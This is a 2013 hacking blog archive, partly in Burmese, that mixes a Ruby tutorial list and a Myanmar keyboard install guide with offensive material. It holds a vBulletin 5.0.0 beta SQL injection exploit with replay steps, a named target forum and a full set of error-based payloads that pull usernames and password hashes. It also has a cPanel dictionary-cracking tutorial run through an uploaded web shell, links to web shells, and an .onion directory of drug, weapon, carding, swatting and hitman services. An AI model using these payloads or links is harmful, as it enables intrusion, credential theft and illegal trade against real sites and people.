Saturday, 20 July 2013

WSO Shell In Python & Perl

Rolleyes  PHP နဲ ့ေရးထားတာ မဟုတ္ဘဲနဲ ့ Python နဲ ့ Perl programming နဲ ့ေရးထားတဲ့ Python Shell နဲ ့ Perl Shell ပါ . 

ဒါကေတာ့ Perl Shell : 

ဒါကေတာ့ Python Shell : 
Download : 
http://www.mediafire.com/download/oebvbpsgfnrruq6/wso.rar
Shell Password : root 

Ruby Tutorials Series By NewBoston (Video Tutorials Series)


1 - Installing Ruby
2 - Writing a Simple Program
3 - Math and Variables
4 - Classes
5 - Creating Objects
6 - Inheritance
7 - Adding More Attributes
8 - Methods
9 - Everything is an Object!
10 - Arguements
11 - String Functions
12 - More About Variables & Methods!
13 - Expressions and Shortcuts
14 - Decision Making
15 - Comparison Operators
16 - unless
17 - Loops
18 - Extracting the Value From Loops
19 - Changing Data Types
20 - Constants
21 - Multiple Line String Variables
22 - Interpolation
23 - Beginning Regular Expressions
24 - Regular Expressions in Loops
25 - Extracting Numbers and Character
26 - Decision Making with Regular Expressions
27 - Beginning Arrays
28 - push and pop
29 - each and length
30 - Cool Array Tricks
31 - Hashes
32 - Methods for Hashes

Here the Link :
http://thenewboston.org/list.php?cat=50

Enjoy and They are Really Easy to UnderStand! :) 

Credit : NewBoston

Friday, 19 July 2013

UNION BASE INJECTION (Ebook)

ဒါက်ြန္ေတာ့္ရဲ ့ပထမဦးဆံုး SQL Injection စာအုပ္ပါ။ Chapter 1 မွာေတာ့ Union Select နဲ ့Inject လုပ္ပံုလုပ္နည္းေလးဘဲေရးထား ပါတယ္ .. .. :D


လင့္ ေသသြားရင္ Comment ေပးခဲ့ပါ . တျခား ဆိုက္ေနတင္ ထပ္တင္ေပးေပါ့မယ္ :D

Tuesday, 16 July 2013

vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day (Priv8)


1337 မွာ $ 300 နဲ ့ေရာင္းထားတာေလးပါ  :)
http://www.priv8.1337day.com/exploit/description/20002
vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day
#Category: web application
#Type: SQL Injection
#Requirements: Firefox/Live HTTP Headers/
#Dork: Powered by vBulletin™ Version 5.0.0 Beta (or) Use ur Brain you'll get more o_O

Step 1
Create an Account on vBulletin forum Verify the account and Activate it
For Demo we will use this Forum
Link = http://www.prospectrush.com/new_forum/
I have alredy made an account so i wil direct login

Step 2
go to/Open any topic and open Live HTTP Headers (https://addons.mozilla.org/en/firefox/addon/live-http-headers/) << download from here
and then on the Topic page search for "Like" button and Clik on it ....
then the Http responce would be caught on HTTP HEaders addon
Step 3
Go to the first POST in HTTP Headers ,it will look like this
POST *Something /ajax/api/reputation/vote HTTP/1.1
select it and click on Replay button
Step 4
Then go on Send POST Content and use below Query ,
just add the Below Query after "noteid=somenumber"
=======================
SQL Query
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
=======================
The Above SQLi command will fetch out the first record from user table(username/password)
see the username and pass in encrypted get the salt to and decrypt it i wont show decrypting use your brain :)

=============
Greets to Real Author , All Indian & Pakistani Brothers , 1337day , ashiyane forums & All Indian Hacking Groups
//Note : Those Brothers who have my mail id can Contact me for other Deals
Offer Valid till 29th March 2013
Regards
./NoTty_rAJ
Thanks

[#Other SQLi Syntaxes]
*********************************************************************************************************************
|Version():
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************

*********************************************************************************************************************
|User():
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************

*********************************************************************************************************************
|Database():
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************

*********************************************************************************************************************
|Database Print:
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
*********************************************************************************************************************
|Table Count:
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
*********************************************************************************************************************
|Print Tables:
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
*********************************************************************************************************************
|Columns of selected table:
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
*********************************************************************************************************************
|Fetch Out Data:
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x 7e) FROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************

Greetz to HeXagone  & Raw-X

Monday, 15 July 2013

Cpanel Cracker (Php Script)


CPanel Cracking Script ပါ ။ Shell ေပၚက တဆင့္ Crack ရတာပါ ။ Tutorial ဖတ္ခ်င္ရင္ http://lit2le.blogspot.com/2013/07/tut-cpanel-cracking.html မွာသြားဖတ္ပါ ။ 

[TUT] Cpanel Cracking

FOR EDUCATIONAL PURPOSE ONLY

လိုအပ္တာက  :-




Step By Step Tutorial :-

  • First open you shell & upload the cpanel password cracker shell . Download the Cpanel password cracker shell from Here 
  • Then go down & click on User .


  • Now after you have clicked on User, below you will get all the usernames of the Cpanel . So now move to next step, your next step will be to get a good Password list for a Dictionary attack . After getting it you have to copy the username & paste it in the username block (above) & paste the password list in the password block .Then finally click on start .

Tip: Password list should be short & effective . 

  • When the cracking is finished, you will see the result . 
  • password ရျပီ ဆိုရင္ -> www.site.com:2082 (ဒါမွမဟုတ္) www.site.com/cpanel ကေန၀င္ပါ ။ (www.site.com:2082 ကအဆင္ေျပ ပိုအဆင္ေျပပါတယ္) :D 
Have Fun lady :)
Credit : h@ck2PlAy

PHP & ASP Shells [Collection]


က်ြန္ေတာ္ သိထားတဲ့ Php Shell နဲ ့ Asp Shell . Web hack ေနတဲ့ ညီကိုေတြအဆင္ေျပတာေအာင္လို ့ပါ ။ 
(Link ေသသြား Comment ထဲမွာေရးေပးခဲ့ပါ) :D Enjoy :D 
PHP Shells 

ASP Shells 

What is the deep web?

ပံုေလးျကည့္ရင္ ရွင္းေလာက္တယ္ ။ ေထြေထြထူးထူးမေျပာေတာ့ပါဘူး ။  သူနဲ ့တိုက္ဆိုင္တဲ့ link ေလးေတြေအာက္မွာတခ်က္ျကည့္ပါ ။
The deep web can only be reached with TOR. 
What is "marians Web"? 
Marianas Web is the deepest deepest deepest part of the Internet/deep web. I never reached it, but i read it many about it and the only thing what i can say is: u dont want to go there! Marianas Web is a Mystery, a few people say it exists and a few say it doesnt exist. I Think it exists, because the "deep web" cant be the deepest part of the Internet. there must be more!! 
What can i find on the "deep web"? 
Well, almost everything. Sad is that many sites have child porn. When u buy something, u MUST pay with Bitcoin (if they want a CC, dont buy it!). Be carefull! The Police is waiting For u.. 
How do i get in the "deep web"? 
Its very simple. U need 1 Software: TOR Install it and go to the websites with the TOR firefox. The websites r very slowly, so dont give up when it is loading it may take up to 2 min. 
Deep Web sites:- 

Directories and Link Lists: 

  • *. TORDir – dppmfxaacucguzpc.onion 
  • *. TorLinks – torlinkbgs6aabns.onion 
  • *. OnionBookmark – x7yxqg5v4j6yzhti.onion 
  • *. The Hidden Wiki – kpvz7ki2v5agwt35.onion/ wiki/index.php/Main_Page 
  • *. TorMarks – 4jbxjjrbakmdcmvb.onion 
  • *. Core.Onion – eqt5g4fuenphqinx.onion 
  • *. Sites Deep Web – ekwreugkil5ncyyh.onion 
  • *. Hidden Wiki PasteBin – pastebin.com/ek0cAbxi 
  • *. Hidden Wiki Mirrors – fkyvwpu7ccsorke2.onion 
  • *. Tor Onion Link List – f3ew3p7s6lbftqm5.onion/ text/TOR.ONION.LINKLIST.txt 



Search Engines: 

  • *. TORCH - xmh57jrzrnw6insl.onion 
  • *. Deep Search - xycpusearchon2mc.onion 



Mail and Hosting 

  • *. Tor Mail – jhiwjjlqpyawmpjx.onion 
  • *. TorPM - 4eiruntyxxbgfv7o.onion/ pm/ 

Commerce:

*. Black Market Reloaded – 5onwnspjvuk7cwvk.onion/ index.php 
*. Silk Road – silkroadvb5piz3r.onion/ index.php 
*. High Supplies – phyofa4vi3y4i5iq.onion 
*. C’thulhu – iacgq6y2j2nfudy7.onion 
*. EU Weapons & Ammunition – 4eiruntyxxbgfv7o.onion/ snapbbs/2e76676/ 
*. HackBB – clsvtzwzdgzkjda7.onion 
Fixed Match Buy-in :
*. Service – j3vsnvvcfvoduip6.onion 
*. CC4ALL – qhkt6cqo2dfs2llt.onion 
*. Downloaditforyou - 3srxdnetmhbfyisw.onion 
*. Swatting Service - jd2iqa4yt7vqvu5o.onion 
*. PayPal Store - 5xhp3ntcxfpfd5ig.onion 


Forums and Post Boards :
*. HackBB – clsvtzwzdgzkjda7.onion 
*. Silk Road Forums – dkn255hz262ypmii.onion/ index.php 
*. RedditTor - k6gsb4ibatcico35.onion 
*. qPastebin – 4eiruntyxxbgfv7o.onion/ paste/ 
*. DoxBin - npieqpvpjhrmdchg.onion 
*. Bittit - ejz7kqoryhqwosbk.onion/ 


Identification: 
*. Onion ID – g6lfrbqd3krju3ek.onion 
*. All Purpose Identities – cf6qjzygqbu2c4z5.onion 
*. Terminal Velocity ID Store - 4eiruntyxxbgfv7o.onion/ snapbbs/22ad3c25/ threadlist.php 


Education and Research :
*. The TOR Library – am4wuhz3zifexz5u.onion 
*. TOR University – ccbn6mrdudb5fbxd.onion/ TorUniversity.html 
*. The Human Experiment - xqz3u5drneuzhaeo.onion 
*. Tard’s Library - xsin4xbme24aatvk.onion 


Security and Society :
*. AntiSec Embassy - ibhg35kgdvnb7jvw.onion 
*. Parazite - qx7j2selmom4ioxf.onion Blogs 
*. LookingGlass - tns7i5gucaaussz4.onion/ blog/ 
*. Hidden Blog - utup22qsb6ebeejs.onion/ 


Tor infrastructure :
http://hbpvnydyyjbmhx6b.onion/ help run the enter - exit servers and set them up or augment the bandwith for certain countries 
http://a5ec6f6zcxtudtch.onion/ tor-i2p-proxy2-en.htm to iepsites 
http://losacd3c5pt25ymv.onion/ not free fast good bridges 
Directory http://zw3crggtadila2sg.onion/ downornot/ down or not test it first 
http://kpvz7ki2v5agwt35.onion/ wiki/index.php/ List_of_Anonymous_Networks 
private services http://ahmia.fi/ just a list of 200 links to sites of which many don't work anymore 
http://32rfckwuorlf4dlv.onion/ some links 
http://torlinkbgs6aabns.onion/ 
http://4jbxjjrbakmdcmvb.onion/ complete.html some links 
http://xqz3u5drneuzhaeo.onion/ users/noel/forum.php?id=1 active forum about links on deepweb 
http://3suaolltfj2xjksb.onion/ hiddenwiki/index.php/Main_Page directory of links 
http://torlinkbgs6aabns.onion/ tor links search 
http://xmh57jrzrnw6insl.onion/ search 1 million onion pages 
http://nstmo7lvh4l32epo.onion/ search.php? query=belgium&search=1 search 
http://sc3njt2i2j4fvqa3.onion/ newzbin search of Usenet interesting onions 
http://kpvz7ki2v5agwt35.onion/ wiki/index.php/Email test security emailservice blog 
http://fkyvwpu7ccsorke2.onion/ mirro...0aj.sn.sourcedns.com/ _gbpprorg/mil/index.html 
http://fkyvwpu7ccsorke2.onion/ mirro...2wcy6jnn4r.onion/ opensource/II/Anonymity.html 
http://fkyvwpu7ccsorke2.onion/ mirrors/-Poly Front/ g7pz322wcy6jnn4r.onion/ opensource/II/Payment.html and anonymity 
http://fkyvwpu7ccsorke2.onion/ mirro... Bureau/ cryptoanarchy.org/wiki/ Main_Page.html wiki about anonimity on the web and services 
http://4eiruntyxxbgfv7o.onion/ anonymous services photo sharing etc bookmarks 
http://x7yxqg5v4j6yzhti.onion/ public and private bookmarks onion 
http:// ay5kwknh6znfmcbb.onion/ torbook/ social network for tor Chat and forums and contactforms to make 
http://4eiruntyxxbgfv7o.onion/ snapbbs/736364f4/index.php anonymous irc chat 
http://4eiruntyxxbgfv7o.onion/ snapbbs/ 
http://ci3hn2uzjw2wby3z.onion/ public chatboard 
http://jhiwjjlqpyawmpjx.onion/ TorMail 
http://a5ec6f6zcxtudtch.onion/ anon-email.htm mixmaster anonymous email 
http://a5ec6f6zcxtudtch.onion/ anon-news.htm anonymous forums mixmaster 
http://c4wcxidkfhvmzhw6.onion/ index.en.html anonymous privacybox as contact for bloggers and journalists 
http://qtt2yl5jocgrk7nu.onion/ encrypted secret keys for people working for or with Indymedia, an alternative worldwide mediaplatform 
http://ueoluw7ltbo6sdx2.onion/ anonymous escrow service paying for payments between seller and buyers hosting 
http:// www.xqz3u5drneuzhaeo.onion/ hidden hosting not free anymore php mysql 
http:// www.ms4kc75hlvnfcxgz.onion/ hidden blogging books 
http://p2uekn2yfvlvpzbu.onion/ books about 
http://c3jemx2ube5v5zpg.onion/ english a lot SF 
http://xsin4xbme24aatvk.onion/ a lot of military and resistance documents 
http://zqhu3ynqqbqzsq2c.onion/ libreria/Hannah Arendt/ 
http:// c3jemx2ube5v5zpg.onion/? author=view&id=18&letter=B Orwell 
http://zqhu3ynqqbqzsq2c.onion/ libreria/ some philosophers 
http://xqz3u5drneuzhaeo.onion/ users...a=FreeBibliothecaAlexan drina Anony Share Uploads many books 
http://utovvyhaflle76gh.onion/ sTORage/Books/ books new world order not done yet 
http:// kpynyvym6xqi7wz2.onion/ files.html older files from the underground - pseudo anarchist bit kiddy 
http://crimethinc.com/books/ alternative anarchistic books and stuff posters and so 
http://am4wuhz3zifexz5u.onion/ but mostly very older books filesharing 
http://4eiruntyxxbgfv7o.onion/ imgzapr/ 
http://utovvyhaflle76gh.onion/ sTORage/ upload site 
http://4eiruntyxxbgfv7o.onion/ paste/ 
http://ocrlwkklxt3ud64u.onion/ tor upload 
http://p7d2k2xiioailnuu.onion/ image upload 
http://i7hknwg4up2jhdkx.onion/ uploader 
http://4eiruntyxxbgfv7o.onion/ anonyshares.html max 10mb 
http://4eiruntyxxbgfv7o.onion/ snapbbs/3232a619/ filesharing forum login 
http://dg6exbqq42btatnw.onion/ file sharing 
http://ldwvpjcrw5mmekvg.onion/ use some of the 100GB of usable FTP space on a server here 
http://f3ew3p7s6lbftqm5.onion/ onion filestore 
http://zw3crggtadila2sg.onion/ imageboard/ chan board very chan 
http://4eiruntyxxbgfv7o.onion/ snapbbs/7fbb7e1f/ paparazzi forum log in Illegal markets
http://silkroadvb5piz3r.onion/ silkroad/register the illegal market 
http://5onwnspjvuk7cwvk.onion/ blackmarket 
http://clsvtzwzdgzkjda7.onion/ active hacking forum and market place 
http://4eiruntyxxbgfv7o.onion/ ads selling stolen creditcards on 
http://clsvtzwzdgzkjda7.onion/ viewtopic.php?f=57&t=3631 IDstores on Tor 
http://xqz3u5drneuzhaeo.onion/ users/experiments/ warehouse3.html fake or not, medical experiments ? 
http://wkwjr7pn7xubtpx5.onion/ carding forum 
http://wihwaoykcdzabadd.onion/ carders planet just page with services 
http://4eiruntyxxbgfv7o.onion/ snapbbs/3e238502/ threadlist.php? carders list quite dead 
http://wdnqg3ehh3hvalpe.onion/ PS3 cracking list and root keys 
http://n2wrix623bp7vvdc.onion/ hackingservices.html just page with hack services 
http://4eiruntyxxbgfv7o.onion/ snapbbs/794b7d4/ cracked games sign up 
http://yj2nu2qygzpjcglm.onion/ one of the so-called hitman for hire hackers 
http://3terbsb5mmmdyhse.onion/ hashers that crack passwords 
http://lcvkso2t5t3cmy3x.onion/ hackcanada/index.html hack canada 
http://4eiruntyxxbgfv7o.onion/ snapbbs/d136fbb/threadlist.php? not very active hackerforum 
http://4eiruntyxxbgfv7o.onion/ snapbbs/4b5fce4e/ hackerforums but need to sign up 
http://u32gu6u4cf5zpkzw.onion/ hiring hackers 
http://ugh6gtz44ifx23e7.onion/ rent a hacker service (scam?) 
http://4eiruntyxxbgfv7o.onion/ snapbbs/19cc6d6e/ uscyberlabs securityforum login Documents, info and pastes 
http://4eiruntyxxbgfv7o.onion/ paste/browse.php pastes recent public 
http://6sgjmi53igmg7fm7.onion/ index.php?title=Main_Page buggedplanet.info copy 
http://f3ew3p7s6lbftqm5.onion/ stratfor_full_misc.txt stratfor full text with cvv 
http://zbnnr7qzaxlk5tms.onion/ wikileaks 2010 
http://utovvyhaflle76gh.onion/ sTORage/Wikileaks Archives/ collatoral damage 
http://npieqpvpjhrmdchg.onion/ doxviewer.php doxing like pastebin 
http://nwycvryrozllb42g.onion/ isp-spy/ all the ISP spy files for police interception 
http://nwycvryrozllb42g.onion/ PS3 jailbreak 
http://nwycvryrozllb42g.onion/ midasbank/ MIDAS bank of American leak 


Credits:Revelation (Team Openfire)
Enjoy lady :P 

Droidsqli Android SQL injection Tool (Android)

Download :.: > http://www.mediafire.com/download/donjrst5fd0odbj/Droidsqli.apk <
 (password) : little

DroidSQLi supports the following injection techniques:


  1. Time based injection
  2. Blind injection
  3. Error based injection
  4. Normal injection

သူ အဲ့ေလာက္ရွင္းျပထားတာ က်ြန္ေတာ္ထက္ရွင္းဖို ့မလိုေတာ့ပါဘူး :P ဒါမဲ့ Notice ေလးဖတ္သြားဦး :D 

Notice: this application is for educational purposes ONLY. No warranties of any kind are expressed or implied. Use at your own risk! 

Saturday, 13 July 2013

Install Zawgyi-one keyboard font On Ubuntu 12.10


Ubuntu 12.10 မွာ Zawgyi သြင္းစရာမလိုဘဲ ျမန္မာလို ဖတ္လို ့ရပါတယ္ .. ဘာလို ့လဲ ဆိုေတာ့ Unicode က build in ပါျပီးသားပါ ။ သုိ ့ေပမဲ့ ျမန္မာလို Keyboard ရိုက္လို ့မရပါဘူး ။ ႏိုင္ငံျခား Forum တခုျဖစ္တဲ့ Ubuntu forum တခုမွာ Mg Nga Pyin ရွင္းျပထားတဲ့ Myanmar Font အေျကာင္းေလး တခုျပေပါ့မယ္ . . . 

How many kinds of Myanmmar fonts are there? 


Four as far as I know .
  1.  Unicode
  2.  Ayar - Unicode, but encoding is slightly modified
  3.  Zawgyi - Non-Unicode
  4.  ASCII - Winn Innwa
အဲဒီထဲမွာ Unicode က Build in ပါျပီးသားဆိုေတာ့ ျမန္မာ လို ေအးေဆးဖတ္လို ့ရပါတယ္ .. .. ဒါမဲ့ ျမန္မာလိုစာရို္က္မယ္ဆိုရင္ Zawgyi one ထည့္ထားဖို ့လိုပါတယ္ ။ တျခား Font လဲထည့္လို ့ရေပမဲ့ Zawgyi one ကေတာ့ ကိုယ္ Window တုန္းက လက္ကြက္နဲ ့ဆိုေတာ့ ပိုအဆင္ေျပတာေပါ့ .. .. :D 

လိုအပ္တဲ့ zawgyi-keyboard-ubuntu.tar.gz ကိုေအာက္မွာ ေဒါင္းလိုက္ပါ ။ 
Pass = little
Download ျပီးသြားရင္ေတာ့ Desktop ေပၚတင္ျပီး Terminal ဖြင့္လိုက္ပါ ။ ျပီးသြားရင္ sudo -s လို ့ရိုက္ထည့္ျပီး ကိုယ့္ Ubuntu မွာေပးထားတဲ့ Password ရိုက္ထည့္လိုက္ပါ ။ [#sudo ဆိုတာကေတာ့ Security ပိုင္းဆိုင္ရာအရ Admin Account ( Linux မွာ root account! လို႕ ေခၚပါတယ္ ) ကပဲ software ကို Install လုပ္ႏုိင္ဖို႕ လုပ္ထားတဲ့အတြက္ root account! က တဆင့္သြားမယ္လို႕ ဆိုထားတာပါ ဒါေၾကာင့္ Password ေတာင္းပါလိမ့္မယ္ ]
ဒါဆိုရင္ zawgyi-keyboard-ubuntu.tar.gz ကိုေျဖဖို ့အတြက္ cd Desktop လို ့ရိုက္ထည့္လိုက္ပါ ။ ျပီးသြားရင္ ေအာက္က Command အတိုင္းေျဖခ်ေပါ့မယ္ ။

tar xzf zawgyi-keyboard-ubuntu.tar.gz 

ဒါဆိုရင္ Zawgyi ဆိုတဲ့ Folder ေလးတခုေပၚလာပါလိမ့္မယ္ .. ဒါဆိုရင္ အဲ့ထဲကို ၀င္ဖို ့အတြက္ cd zawgyi လို ့ရိုက္ထည့္လိုက္ပါ။
ျပီးသြားရင္ sudo sh install.sh ရိုက္ထည့္ျပီး Install စလုပ္ေပါ့မယ္ .. .. 
1 လို ့ရိုက္ထည့္ေပးလိုက္ပါ . Install complete လို ့ေပၚလာျပီဆိုရင္ ကိစၥ ျပီးပါျပီ ။ Keyboard ဘဲ Change ေပးရံုဘဲရွိေတာ့တယ္ .

KeyBoard ခ်ိန္းဖို ့အတြက္ System Settings ထဲ၀င္လိုက္ပါ ။ 
ျပီးရင္ Keyboard Layout ကိုႏိုပ္လိုက္ပါ ။ 
Ok . ဒါဆိုရင္ ေအာက္ဆံုးက အေပါင္းပုံစံေလးကုိ နုိပ္လုိက္ျပီး Myanmar ကုိ ရိုက္ထည့္လိုက္ပါ။ 
ေပၚလာတာက Burmese အဟီးး :D Burmese ကို ေရြးေပးျပီးရင္ ေဘးနားက option ကုိ နုိပ္ပါ။ 
အဲ့မွာ Key(s) To Change Layout ဆိုတဲ့ tab ေလးကို ျဖည္ခ်လိုက္ျပီး Alt+Shift ဆိုတာေလး ေရြးေပးလိုက္ပါ ။ (ဒီသေဘာက font ေျပာင္းရင္ဘယ္ခလုတ္နဲ႔ေျပာင္းမလဲဆုိတာကုိေျပာတာပါ။ ၾကဳိက္တာေရြးလုိ႔ရပါတယ္။) ။ 

ဒါဆိုရင္  ျမန္မာ လိုေရးလို ့ရပါျပီ ။ ဟုတ္မဟုတ္ စမ္းေရးျကည့္ရေအာင္ ။ 



#Have Fun Lady :P

Monday, 8 July 2013

SQLMap Tutorial By H1N1

က်ြန္ေတာ္တို ့ M.H.U က Bro H1N1 ေရးထားတဲ့ စာအုပ္ေလးပါ ။ SQLmap ျဖင့္ Attacking လုပ္တဲ့နည္းေလး အေျခခံက်က် ေရးေပးထားပါတယ္ ။ ။ ။ SQLMap အေျကာင္းကိုေလ့လာေနတဲ့ ညီကုိေတြအတြက္ အထူးအဆင္ေျပေလာက္တယ္ ။ ။

[+] Download From Mediafire [+]



Wednesday, 3 July 2013

:.:How to lock Folder with Password ?

How to lock Folder with Password ?


Folder ေတြကုိ Password ေပးျပီး ကာကြယ္ဖို႔ နည္းလမ္းေပါင္း အမ်ားၾကီးရွိပါတယ္ . တခ်ိဳ ့က Software သံုးျပီး ကာကြယ္က်ပါတယ္ ။ ဒါေပမယ့္ ကၽြန္ေတာ္ ဒီ Post မွာ Folder ေတြကုိ Software မသံုးပဲ Password ေပးျပီး ကာကြယ္နည္းပါ ။

  • ပထမဦးဆံုး ကိုယ္ Password Lock ခ်မဲ့ Folder တစ္ခုထဲ ၀င္လိုက္ပါ ။ 
  • ျပီးသြားရင္ ကိုယ့္ Folder ထဲမွာ Text file တစ္ခု Create လုပ္လိုက္ပါ (Right Click Context Menu ကေန လုပ္လုိ႔ရပါတယ္)